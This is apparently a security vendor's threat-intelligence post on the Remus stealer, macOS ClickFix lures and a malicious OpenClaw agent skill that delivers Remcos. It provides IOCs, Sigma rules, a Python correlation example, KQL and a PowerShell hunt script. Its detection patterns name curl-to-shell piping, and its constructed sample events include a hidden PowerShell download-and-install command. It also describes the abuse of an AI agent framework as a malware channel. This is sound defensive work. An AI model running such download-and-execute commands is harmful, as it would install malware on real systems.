Remus Stealer, ClickFix & AI Framework Abuse: Cross-Platform Infostealer Campaigns — OTX Pulse Analysis

Security Arsenal Team
May 8, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of sophisticated social engineering and emerging abuse vectors targeting both macOS and Windows environments. Threat actors are actively deploying ClickFix campaigns on macOS, utilizing fake utility troubleshooting guides to deliver payloads like Macsync, Shub Stealer, and AMOS via malicious Terminal commands. Simultaneously, the Windows ecosystem faces the evolution of Lumma Stealer into Remus, a 64-bit infostealer specifically designed to bypass Application-Bound Encryption (ABE) to extract browser credentials and crypto wallet data. Furthermore, a novel attack vector has been observed involving the weaponization of AI agent frameworks (specifically OpenClaw/"DeepSeek-Claw") to distribute Remcos RAT and GhostLoader via signed binary sideloading.

The collective objective of these campaigns is credential harvesting, cryptocurrency theft, and establishing persistent remote access. The use of signed binaries (GoToMeeting) and trusted AI frameworks highlights a shift toward "living-off-the-land" and supply-chain-adjacent trust exploitation.

Threat Actor / Malware Profile

Remus Stealer (Lumma Successor)

  • Type: 64-bit Information Stealer (Windows).
  • Origin: Evolution of Lumma Stealer; emerged following the doxxing of Lumma core members in late 2025.
  • Capabilities: Bypasses Application-Bound Encryption (ABE) in Chrome/Edge to steal cookies and passwords. Steals cryptocurrency wallet data and 2FA sessions.
  • C2: Uses Ethereum blockchain for C2 communication (EtherHiding) or traditional IP-based infrastructure.

ClickFix Campaign (macOS)

  • Type: Social Engineering / Script-based Dropper.
  • Target: macOS users.
  • Payloads: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution: Fake blog posts posing as system utility fixes. Victims are tricked into copying and pasting malicious curl commands into Terminal.

Remcos RAT & GhostLoader

  • Type: Remote Access Trojan & Loader.
  • Distribution: Malicious "DeepSeek-Claw" skill within the OpenClaw AI agent framework.
  • Execution: PowerShell command downloads an MSI containing a signed GoToMeeting executable (GoToMeeting.exe). This legitimate binary sideloads a malicious DLL (GhostLoader/Remcos).
  • Persistence: Registry run keys and scheduled tasks.

IOC Analysis

The provided indicators of compromise (IOCs) cover infrastructure and file artifacts associated with these campaigns.

  • Domains: A mix of C2 domains (e.g., dropras.xyz, jihiz.com) and payload delivery infrastructure. SOC teams should immediately block these at the perimeter and DNS resolvers.
  • IP Addresses: Specific ranges (e.g., 217.156.122.0/24) are linked to the Remus stealer infrastructure.
  • File Hashes (MD5/SHA1): Several MD5 and SHA1 hashes correspond to the malicious MSI packages and DLLs used in the OpenClaw/Remcos campaign. These should be added to EDR blocklists and scanned for in quarantines.

Operational Note: These IOCs are "live" and should be treated as high-priority block lists. Due to the use of signed binaries in the Remcos campaign, signature-based detection alone may fail; behavioral heuristics for process injection and sideloading are required.

Detection Engineering

The following detection rules and queries are designed to identify the specific behaviors observed in these pulses.

Sigma Rules

YAML
title: Potential macOS ClickFix Terminal Download
id: 7a8e9f1a-2b3c-4d5e-6f7a-8b9c0d1e2f3a
description: Detects shell or curl/wget processes spawned under Terminal that fetch remote content and hand it to a shell or mark it executable, the pattern seen in ClickFix campaigns where the victim pastes a command from a fake troubleshooting page.
author: Security Arsenal
date: 2026-05-08
status: experimental
logsource:
  category: process_creation
  product: macos
detection:
  # The pasted command runs in a child of Terminal, so match on the parent. Terminal's own
  # process creation never carries the curl arguments, so matching Image on Terminal cannot fire.
  # Assumes the telemetry attributes the spawned shell/curl to Terminal as parent; adjust the
  # ancestry field if your sensor exposes a deeper parent chain (login -> zsh -> curl).
  selection:
    ParentImage|endswith: '/Terminal.app/Contents/MacOS/Terminal'
    CommandLine|contains:
      - 'curl '
      - 'wget '
  selection_download:
    CommandLine|contains:
      - '| sh'
      - '| bash'
      - '| zsh'
      - 'chmod +x'
      - 'http://'
  condition: all of selection*
falsepositives:
  - Legitimate software installation via terminal
level: high
tags:
  - attack.execution
  - attack.t1059.004
---
title: Remcos/GhostLoader MSI Sideload via PowerShell
id: b9c0d1e2-3f4a-5b6c-7d8e-9f0a1b2c3d4e
description: >
  Detects the stages of the OpenClaw Remcos delivery chain seen in the pulses: PowerShell
  downloads an MSI, msiexec installs it, and the signed GoToMeeting binary is launched to
  sideload the GhostLoader/Remcos DLL. Each stage is matched as its own process_creation
  event. A single Sigma detection block cannot correlate several events over time, so the
  original 5-minute timeframe is dropped here and belongs in a correlation rule or SIEM query.
author: Security Arsenal
date: 2026-05-08
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_ps:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadFile'
  selection_ps_msi:
    CommandLine|contains: '.msi'
  selection_msiexec:
    ParentImage|endswith: '\powershell.exe'
    Image|endswith: '\msiexec.exe'
    CommandLine|contains: '.msi'
  selection_sideload:
    # The DLL load itself is only visible in image_load telemetry; the observable stage here is
    # the signed binary being started by the installer. Assumes the MSI launches it directly;
    # adjust the parent if your telemetry shows a different launcher.
    ParentImage|endswith: '\msiexec.exe'
    Image|endswith:
      - '\GoToMeeting.exe'
      - '\g2mcomm.exe'
  condition: (selection_ps and selection_ps_msi) or selection_msiexec or selection_sideload
falsepositives:
  - Legitimate GoToMeeting installation (rare via scripted MSI download)
level: critical
tags:
  - attack.defense_evasion
  - attack.t1574.002
---
title: Remus Stealer Network Activity
id: 1c2d3e4f-5a6b-7c8d-9e0f-1a2b3c4d5e6f
description: Detects outbound connections to the IP ranges reported as Remus Stealer C2 infrastructure in the referenced OTX pulses.
author: Security Arsenal
date: 2026-05-08
status: experimental
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationIp|cidr:
      - '217.156.122.0/24'
      - '45.151.106.0/24'
    DestinationPort:
      - 80
      - 443
      - 8080
  condition: selection
falsepositives:
  - Unlikely; the ranges are attributed to C2 infrastructure, but confirm attribution before blocking shared hosting
level: critical
tags:
  - attack.command_and_control
  - attack.t1071.001
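The second rule's intent, a PowerShell download, an msiexec install and a GoToMeeting.exe launch on one host inside five minutes, needs correlation across events that a single Sigma detection block cannot express. The Python below is an added example, not part of the pulse or of Security Arsenal's tooling; hostnames, paths and the download URL in the sample events are constructed, and only the binary names come from the text above:

```python
"""Added example (not from the pulse): correlate PowerShell -> msiexec -> GoToMeeting.exe
on one host within a 5-minute window, which a single Sigma detection block cannot express."""
from collections import defaultdict
from datetime import datetime, timedelta

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"

# Constructed process-creation events: (host, timestamp, image path, command line).
# Hosts, paths and URLs are made up; only the binary names come from the pulse.
EVENTS = [
    ("WS01", "2026-05-08T09:00:01", PS, r"powershell -w hidden Invoke-WebRequest http://example.invalid/p.msi -OutFile C:\Users\Public\p.msi"),
    ("WS01", "2026-05-08T09:00:04", MSIEXEC, r"msiexec /i C:\Users\Public\p.msi /qn"),
    ("WS01", "2026-05-08T09:00:09", r"C:\Users\Public\G2M\GoToMeeting.exe", "GoToMeeting.exe"),
    ("WS02", "2026-05-08T10:15:00", MSIEXEC, r"msiexec /i D:\setup.msi"),  # benign interactive install
    ("WS03", "2026-05-08T11:00:00", PS, r"powershell Invoke-WebRequest http://example.invalid/t.msi -OutFile C:\t.msi"),
    ("WS03", "2026-05-08T11:20:00", MSIEXEC, r"msiexec /i C:\t.msi"),  # stages 2-3 outside the window
    ("WS03", "2026-05-08T11:20:05", r"C:\Program Files\G2M\GoToMeeting.exe", "GoToMeeting.exe"),
]

# One predicate per stage; image and command line are compared lower-cased.
STAGES = (
    lambda img, cmd: img.endswith("\\powershell.exe") and ".msi" in cmd
    and ("invoke-webrequest" in cmd or "downloadfile" in cmd),
    lambda img, cmd: img.endswith("\\msiexec.exe") and ".msi" in cmd,
    lambda img, cmd: img.endswith(("\\gotomeeting.exe", "\\g2mcomm.exe")),
)


def correlate(events, window=timedelta(minutes=5)):
    """Return (host, first_ts, last_ts) wherever all stages fire in order within `window`."""
    by_host = defaultdict(list)
    for host, ts, image, cmd in events:
        by_host[host].append((datetime.fromisoformat(ts), image.lower(), cmd.lower()))
    alerts = []
    for host, evs in sorted(by_host.items()):
        evs.sort()  # chronological per host
        for i, (t0, img0, cmd0) in enumerate(evs):
            if not STAGES[0](img0, cmd0):
                continue  # anchor only on the scripted download
            stage = 1
            for t, img, cmd in evs[i + 1:]:
                if t - t0 > window:
                    break  # this anchor's window has closed
                if STAGES[stage](img, cmd):
                    stage += 1
                    if stage == len(STAGES):
                        alerts.append((host, t0.isoformat(), t.isoformat()))
                        break
    return alerts
```

Only WS01 is reported: WS02 never performs the scripted download, and WS03 completes the chain too slowly for the window.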

KQL (Microsoft Sentinel)

KQL
// Hunt for connections to the pulse's C2/delivery domains and the Remus IP range,
// and for any file event carrying one of the OpenClaw/Remcos payload hashes
DeviceNetworkEvents
| where RemoteUrl has_any ("jihiz.com", "kayeart.com", "bintail.com", "malext.com", "miappl.com", "dropras.xyz", "trackpipe.dev")
    or ipv4_is_in_range(RemoteIP, "217.156.122.0/24")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
| union (
    // File create/modify/rename events whose hash matches a known payload
    DeviceFileEvents
    | where SHA1 in ("470c3803bd5a4770eb5470a84a831f187f591c64") or MD5 in (
        "1c267cab0a800a7b2d598bc1b112d5ce", "2a5f619c966ef79f4586a433e3d5e7ba",
        "2c4b7c8b48e6b4e5f3e8854f2abfedb5", "82536825e700f4c863238a90dd314687",
        "cc1af839a956c8e2bf8e721f5d3b7373"
    )
    | project Timestamp, DeviceName, FileName, FolderPath, SHA1, MD5, InitiatingProcessAccountName
)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
    IOC Hunter for OpenClaw/Remcos Campaign
    Hashes files against the MD5s of the malicious MSI and DLL payloads and checks
    live TCP connections against the Remus C2 addresses. Run elevated so that
    protected directories can be read.
#>

$MaliciousMD5 = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373"
)

Write-Host "[+] Starting IOC Scan for OpenClaw Remcos/GhostLoader Artifacts..." -ForegroundColor Cyan

# Hash every file on C: (-File skips directories, which Get-FileHash cannot hash; -Force includes hidden/system files).
# A full-volume scan is slow; narrow -Path to user profiles or temp locations for quick triage.
Get-ChildItem -Path C:\ -File -Recurse -Force -ErrorAction SilentlyContinue |
ForEach-Object {
    $file = $_
    try {
        $hash = (Get-FileHash -Path $file.FullName -Algorithm MD5 -ErrorAction Stop).Hash.ToLower()
        if ($MaliciousMD5 -contains $hash) {
            Write-Host "[!] MALICIOUS FILE DETECTED: $($file.FullName)" -ForegroundColor Red
            Write-Host "    MD5: $hash" -ForegroundColor Red
        }
    } catch {
        # Locked or inaccessible files are skipped
    }
}

# Check for connections to Remus C2 IPs: the listed addresses plus the whole /24 called out in the pulse
Write-Host "[+] Checking active connections for Remus C2 IPs..." -ForegroundColor Cyan
$RemusIPs = @("217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")
$RemusRangePrefix = "217.156.122."

# Note: $matches is a PowerShell automatic variable (populated by -match), so a different name is used here
$hits = Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $_.RemoteAddress -in $RemusIPs -or $_.RemoteAddress.StartsWith($RemusRangePrefix) }

if ($hits) {
    Write-Host "[!] C2 CONNECTION(S) DETECTED" -ForegroundColor Red
    $hits | Format-Table LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess,
        @{ Name = 'Process'; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } }
}

Write-Host "Scan Complete." -ForegroundColor Green

Response Priorities

  • Immediate:
    • Block all listed domains and IP ranges at the firewall/proxy level.
    • Scan endpoints for the provided MD5/SHA1 hashes (OpenClaw payload).
    • Kill any processes connecting to the 217.156.122.0/24 subnet.
  • 24 Hours:
    • Trigger a forced password reset and MFA re-enrollment for accounts accessed from devices where infostealers (Remus, AMOS, Shub) were detected.
    • Investigate the browser history and download folders on macOS endpoints for signs of "ClickFix" fake utility pages.
    • Review logs for PowerShell execution of MSI files matching the Remcos/GhostLoader pattern.
  • 1 Week:
    • Update application hardening policies to enforce strict signing requirements for PowerShell scripts.
    • Implement DNS filtering for domains commonly used in ClickFix campaigns.
    • Review and restrict the use of AI agent frameworks (like OpenClaw) in development environments to prevent "skill" abuse.
